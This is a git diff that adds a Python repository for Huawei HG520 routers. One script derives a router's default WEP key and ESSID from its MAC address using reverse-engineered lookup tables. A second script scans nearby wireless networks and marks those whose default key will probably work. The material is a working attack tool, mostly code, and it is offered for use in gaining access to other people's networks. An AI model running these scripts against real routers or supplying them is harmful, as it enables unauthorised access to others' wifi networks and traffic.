git subrepo clone https://github.com/davux/huawei_wifi huawei_wifi

subrepo:
  subdir:   "huawei_wifi"
  merged:   "2667461"
upstream:
  origin:   "https://github.com/davux/huawei_wifi"
  branch:   "master"
  commit:   "2667461"
git-subrepo:
  version:  "0.2.0"
  origin:   "???"
  commit:   "???"

huawei_wifi/.gitrepo

@@ -0,0 +1,11 @@
+; DO NOT EDIT (unless you know what you are doing)
+;
+; This subdirectory is a git "subrepo", and this file is maintained by the
+; git-subrepo command. See https://github.com/git-commands/git-subrepo#readme
+;
+[subrepo]
+	remote = https://github.com/davux/huawei_wifi
+	branch = master
+	commit = 266746106951552d4db4ca4a0ca0aa4eb45b6a2f
+	parent = adf40673ede1aed9dd42f369acdd9f3d5b262c5f
+	cmdver = 0.2.0

huawei_wifi/README.md

@@ -0,0 +1,41 @@
+Wifi utilities for finding Huawei routers' default key
+======================================================
+
+Some Huawei routers use a default WEP key that is easy findable because
+it can be calculated using the MAC address of the router.
+
+Thanks and congrats to the clever people at Websec.mx for
+[figuring out](http://websec.mx/blog/ver/mac2wepkey_huawei) the generation
+algorithm after many hours of reverse-engineering.
+
+This repository contains two programs that make use of the discovery.
+
+
+mac2defaults.py
+---------------
+
+This is the original script, improved so that it looks more like Python and
+less like C.
+The output was also cleaned a bit, and the program can work either in
+interactive or automated mode.
+
+- Interactive mode means no command-line parameter was given. The program then
+  asks for a MAC address and outputs the corresponding key and default ESSID.
+  Then it starts over until an empty address is given.
+- When one or several MAC addresses are given on the command line, the program
+  outputs the corresponding default key and ESSID in a machine-parseable
+  format.
+
+The program works as a Python module as well, which means its functions can be
+used by other programs internally.
+
+
+scan_vulnerable_aps.py
+----------------------
+
+This program scans the available networks around and computes the default WEP
+key assuming it's a Huawei modem. If the default ESSID derived from the MAC
+matches the actual ESSID, it marks the line with a '*' so that you know the
+key will probably work. Otherwise, the line is marked with a '-', which means
+it probably won't work, but you can try it anyway, since the ESSID could have
+been changed manually.

huawei_wifi/__init__.py

@@ -0,0 +1 @@
+'''Compute the default key for some Huawei wireless routers'''

huawei_wifi/mac2defaults.py

@@ -0,0 +1,98 @@
+#! /usr/bin/python
+
+##
+## mac2wepkey - Default WEP key generator for Huawei HG520
+##
+## Original reverse-engineering and code:
+##     [email protected] - http://websec.mx (12/2010)
+## Further improved by David Ammouial (2012)
+##
+
+a0=0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
+a1=0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
+a2=0,13,10,7,5,8,15,2,10,7,0,13,15,2,5,8
+a3=0,1,3,2,7,6,4,5,15,14,12,13,8,9,11,10
+a5=0,4,8,12,0,4,8,12,0,4,8,12,0,4,8,12
+a8=0,5,11,14,6,3,13,8,12,9,7,2,10,15,1,4
+a10=0,14,13,3,11,5,6,8,6,8,11,5,13,3,0,14
+
+def _hex2dec(s):
+	return int(s, 16)
+
+def default_key(mac_as_string):
+    a7=0,8,0,8,1,9,1,9,2,10,2,10,3,11,3,11
+    a14=0,1,3,2,7,6,4,5,14,15,13,12,9,8,10,11
+    a15=0,1,3,2,6,7,5,4,13,12,14,15,11,10,8,9
+    n5=0,5,1,4,6,3,7,2,12,9,13,8,10,15,11,14
+    n6=0,14,4,10,11,5,15,1,6,8,2,12,13,3,9,7
+    n7=0,9,0,9,5,12,5,12,10,3,10,3,15,6,15,6
+    n11=0,14,13,3,9,7,4,10,6,8,11,5,15,1,2,12
+    n12=0,13,10,7,4,9,14,3,10,7,0,13,14,3,4,9
+    n13=0,1,3,2,6,7,5,4,15,14,12,13,9,8,10,11
+    n14=0,1,3,2,4,5,7,6,12,13,15,14,8,9,11,10
+    n31=0,10,4,14,9,3,13,7,2,8,6,12,11,1,15,5
+    mac = map(_hex2dec, mac_as_string.replace(':',''))
+    ya=(a2[mac[0]])^(n11[mac[1]])^(a7[mac[2]])^(a8[mac[3]])^(a14[mac[4]])^(a5[mac[5]])^(a5[mac[6]])^(a2[mac[7]])^(a0[mac[8]])^(a1[mac[9]])^(a15[mac[10]])^(a0[mac[11]])^13
+    yb=(n5[mac[0]])^(n12[mac[1]])^(a5[mac[2]])^(a7[mac[3]])^(a2[mac[4]])^(a14[mac[5]])^(a1[mac[6]])^(a5[mac[7]])^(a0[mac[8]])^(a0[mac[9]])^(n31[mac[10]])^(a15[mac[11]])^4
+    yc=(a3[mac[0]])^(a5[mac[1]])^(a2[mac[2]])^(a10[mac[3]])^(a7[mac[4]])^(a8[mac[5]])^(a14[mac[6]])^(a5[mac[7]])^(a5[mac[8]])^(a2[mac[9]])^(a0[mac[10]])^(a1[mac[11]])^7
+    yd=(n6[mac[0]])^(n13[mac[1]])^(a8[mac[2]])^(a2[mac[3]])^(a5[mac[4]])^(a7[mac[5]])^(a2[mac[6]])^(a14[mac[7]])^(a1[mac[8]])^(a5[mac[9]])^(a0[mac[10]])^(a0[mac[11]])^14
+    ye=(n7[mac[0]])^(n14[mac[1]])^(a3[mac[2]])^(a5[mac[3]])^(a2[mac[4]])^(a10[mac[5]])^(a7[mac[6]])^(a8[mac[7]])^(a14[mac[8]])^(a5[mac[9]])^(a5[mac[10]])^(a2[mac[11]])^7
+    keydigits=30,31,32,33,34,35,36,37,38,39,61,62,63,64,65,66
+    return str(keydigits[ya])+str(keydigits[yb])+str(keydigits[yc])+str(keydigits[yd])+str(keydigits[ye])
+
+def default_ssid(mac_as_string):
+    a4=0,5,11,14,7,2,12,9,15,10,4,1,8,13,3,6
+    a6=0,1,3,2,6,7,5,4,12,13,15,14,10,11,9,8
+    a9=0,9,2,11,5,12,7,14,10,3,8,1,15,6,13,4
+    a11=0,12,8,4,1,13,9,5,2,14,10,6,3,15,11,7
+    a12=0,4,9,13,2,6,11,15,4,0,13,9,6,2,15,11
+    a13=0,8,1,9,3,11,2,10,6,14,7,15,5,13,4,12
+    n1=0,14,10,4,8,6,2,12,0,14,10,4,8,6,2,12
+    n2=0,8,0,8,3,11,3,11,6,14,6,14,5,13,5,13
+    n3=0,0,3,3,2,2,1,1,4,4,7,7,6,6,5,5
+    n4=0,11,12,7,15,4,3,8,14,5,2,9,1,10,13,6
+    n8=0,5,11,14,2,7,9,12,12,9,7,2,14,11,5,0
+    n9=0,0,0,0,4,4,4,4,0,0,0,0,4,4,4,4
+    n10=0,8,1,9,3,11,2,10,5,13,4,12,6,14,7,15
+    n15=0,6,12,10,9,15,5,3,2,4,14,8,11,13,7,1
+    n16=0,11,6,13,13,6,11,0,11,0,13,6,6,13,0,11
+    n17=0,12,8,4,1,13,9,5,3,15,11,7,2,14,10,6
+    n18=0,12,9,5,2,14,11,7,5,9,12,0,7,11,14,2
+    n19=0,6,13,11,10,12,7,1,5,3,8,14,15,9,2,4
+    n20=0,9,3,10,7,14,4,13,14,7,13,4,9,0,10,3
+    n21=0,4,8,12,1,5,9,13,2,6,10,14,3,7,11,15
+    n22=0,1,2,3,5,4,7,6,11,10,9,8,14,15,12,13
+    n23=0,7,15,8,14,9,1,6,12,11,3,4,2,5,13,10
+    n24=0,5,10,15,4,1,14,11,8,13,2,7,12,9,6,3
+    n25=0,11,6,13,13,6,11,0,10,1,12,7,7,12,1,10
+    n26=0,13,10,7,4,9,14,3,8,5,2,15,12,1,6,11
+    n27=0,4,9,13,2,6,11,15,5,1,12,8,7,3,14,10
+    n28=0,14,12,2,8,6,4,10,0,14,12,2,8,6,4,10
+    n29=0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3
+    n30=0,15,14,1,12,3,2,13,8,7,6,9,4,11,10,5
+    n32=0,10,5,15,11,1,14,4,6,12,3,9,13,7,8,2
+    n33=0,4,9,13,3,7,10,14,7,3,14,10,4,0,13,9
+    mac = map(_hex2dec, mac_as_string.replace(':',''))
+    s1=(n1[mac[0]])^(a4[mac[1]])^(a6[mac[2]])^(a1[mac[3]])^(a11[mac[4]])^(n20[mac[5]])^(a10[mac[6]])^(a4[mac[7]])^(a8[mac[8]])^(a2[mac[9]])^(a5[mac[10]])^(a9[mac[11]])^5
+    s2=(n2[mac[0]])^(n8[mac[1]])^(n15[mac[2]])^(n17[mac[3]])^(a12[mac[4]])^(n21[mac[5]])^(n24[mac[6]])^(a9[mac[7]])^(n27[mac[8]])^(n29[mac[9]])^(a11[mac[10]])^(n32[mac[11]])^10
+    s3=(n3[mac[0]])^(n9[mac[1]])^(a5[mac[2]])^(a9[mac[3]])^(n19[mac[4]])^(n22[mac[5]])^(a12[mac[6]])^(n25[mac[7]])^(a11[mac[8]])^(a13[mac[9]])^(n30[mac[10]])^(n33[mac[11]])^11
+    s4=(n4[mac[0]])^(n10[mac[1]])^(n16[mac[2]])^(n18[mac[3]])^(a13[mac[4]])^(n23[mac[5]])^(a1[mac[6]])^(n26[mac[7]])^(n28[mac[8]])^(a3[mac[9]])^(a6[mac[10]])^(a0[mac[11]])^10
+    ssidchars=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
+    return ssidchars[s1]+ssidchars[s2]+ssidchars[s3]+ssidchars[s4]
+
+if __name__ == "__main__":
+    from sys import argv
+    if 1 < len(argv):
+        for mac in argv[1:]:
+            print "%s\tWEP = %s\tSSID = %s" % (mac, default_key(mac), default_ssid(mac))
+    else:
+        print "\n  #####################################################"
+        print "  #         Huawei Echo Life HG520 mac2wepkey         #"
+        print "  #        [email protected]  - http://websec.mx       #"
+        print "  #####################################################"
+        while True:
+            mac=raw_input("\n  Ingresa la MAC: ")
+            if 0 < len(mac):
+                print "\n          WEP = %s      SSID = %s\n\n" % (default_key(mac), default_ssid(mac))
+            else:
+                break

huawei_wifi/scan_vulnerable_aps.py

@@ -0,0 +1,54 @@
+#!/usr/bin/env python
+
+import errno
+import sys
+import types
+from mac2defaults import default_key, default_ssid
+try:
+    import pythonwifi.flags
+    from pythonwifi.iwlibs import Wireless, Iwrange, getNICnames
+except ImportError:
+    sys.stderr.write("Error: missing pythonwifi module\n")
+    sys.exit(1)
+
+def print_probable_keys(wifi):
+    """ Print the probable keys
+    """
+    # "Check if the interface could support scanning"
+    try:
+        iwrange = Iwrange(wifi.ifname)
+    except IOError, (error_number, error_string):
+        sys.stderr.write("%-8.16s  Interface doesn't support scanning.\n\n" % (
+                            wifi.ifname))
+    else:
+        try:
+            results = wifi.scan()
+        except IOError, (error_number, error_string):
+            if error_number == errno.EPERM:
+                sys.stderr.write("Permission denied. Did you run the program as root?\n")
+            else:
+                sys.stderr.write(
+                    "%-8.16s  Interface doesn't support scanning : %s\n\n" %
+                    (wifi.ifname, error_string))
+        else:
+            for ap in results:
+                if "Master" == ap.mode:
+                    defaultkey = default_key(ap.bssid)
+                    defaultessid = default_ssid(ap.bssid)
+                    if ap.essid[-4:] == defaultessid:
+                        print "* %s: %s" % (ap.essid, defaultkey)
+                    else:
+                        print "- %s: %s" % (ap.essid, defaultkey)
+
+
+def main():
+    # if only program name is given, print usage info
+    if len(sys.argv) == 1:
+        ifname = "wlan0"
+    else:
+        ifname = sys.argv[1]
+    wifi = Wireless(ifname)
+    print_probable_keys(wifi)
+
+if __name__ == "__main__":
+    main()